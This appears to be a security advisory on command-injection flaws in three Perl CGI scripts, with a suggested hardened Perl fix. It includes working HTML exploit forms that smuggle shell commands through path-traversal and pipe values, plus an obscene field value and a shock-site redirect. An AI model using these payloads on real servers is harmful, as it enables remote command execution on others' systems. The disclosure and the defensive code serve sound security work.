COMMAND

    Tammie's HUSBAND scripts

SYSTEMS AFFECTED

    Tammie's HUSBAND scripts

PROBLEM

    'rpc' found a number of bugs in "Scripts by Tammie's HUSBAND".
    ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure
    input validation vulnerability.  Information on ad.cgi is
    available at:

        http://www.conservatives.net/atheist/scripts/index.html?ads

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ...
        open (INFO, "$datafile");

    Exploit:

    <html>
    <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
    <input type=submit value=run>
    </form>
    </html>

    everythingform.cgi uses a hidden field 'config' to determine
    where to read configuration data from.

    Code snippet:

        ..
        $ConfigFile = $in{config};
        ..
        open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

        http://www.conservatives.net/atheist/scripts/index.html?everythingform

    Sample exploit:

    <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="foo@bar.net">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>
    </form>

    simplestmail.cgi is another Perl CGI script written by "Tammie's
    HUSBAND" Leif Wright.  It's available from:

        http://www.conservatives.net/atheist/scripts/index.html?simplestmail

    The code is self-explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straightforward:

    <html>
    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="http://goatse.cx">
    <input type=submit name=submit value="run">
    </form>
    </html>

SOLUTION

    Nothing yet.
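
    All three scripts pass a form value straight into an open() call
    that can run a command.  The hardened forms of those calls are
    sketched below as an added example, not code from the scripts or
    their author; the helper names, the allowlist patterns and the
    sample inputs are assumptions:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: accept only a bare file name (no '/', no '|',
# no whitespace, no leading dot), so neither traversal nor a pipe survives.
sub safe_name {
    my ($v) = @_;
    return undef unless defined $v;
    return $1 if $v =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z/;
    return undef;
}

# Hypothetical helper: conservative address allowlist; the first character
# cannot be '-', so the value can never be parsed as a mailer option.
sub safe_addr {
    my ($v) = @_;
    return undef unless defined $v;
    return $1 if $v =~ /\A([A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9.-]+)\z/;
    return undef;
}

# ad.cgi / everythingform.cgi pattern: three-argument open with an explicit
# read mode, so the path is never interpreted as a command.
sub open_data_file {
    my ($dir, $user_value) = @_;
    my $name = safe_name($user_value);
    return unless defined $name;
    open(my $fh, '<', "$dir/$name") or return;
    return $fh;
}

# simplestmail.cgi pattern: list-form pipe open runs $mailprog directly,
# without a shell, and passes the address as a single argument.
sub open_mailer {
    my ($mailprog, $user_value) = @_;
    my $addr = safe_addr($user_value);
    return unless defined $addr;
    open(my $mail, '|-', $mailprog, $addr) or return;
    return $mail;
}

# Constructed sample inputs; the first is the value used in the forms above.
for my $in ('../../../../../../../../bin/ping -c 5 www.foo.com|', 'banner1.txt', '..') {
    printf "%-55s file name %s\n", "'$in'", defined(safe_name($in)) ? 'accepted' : 'rejected';
}
for my $in (';', 'foo@bar.net', '-t@x') {
    printf "%-55s address   %s\n", "'$in'", defined(safe_addr($in)) ? 'accepted' : 'rejected';
}
```

    Only 'banner1.txt' and 'foo@bar.net' pass the checks; the other
    sample values are rejected before any open() call is reached.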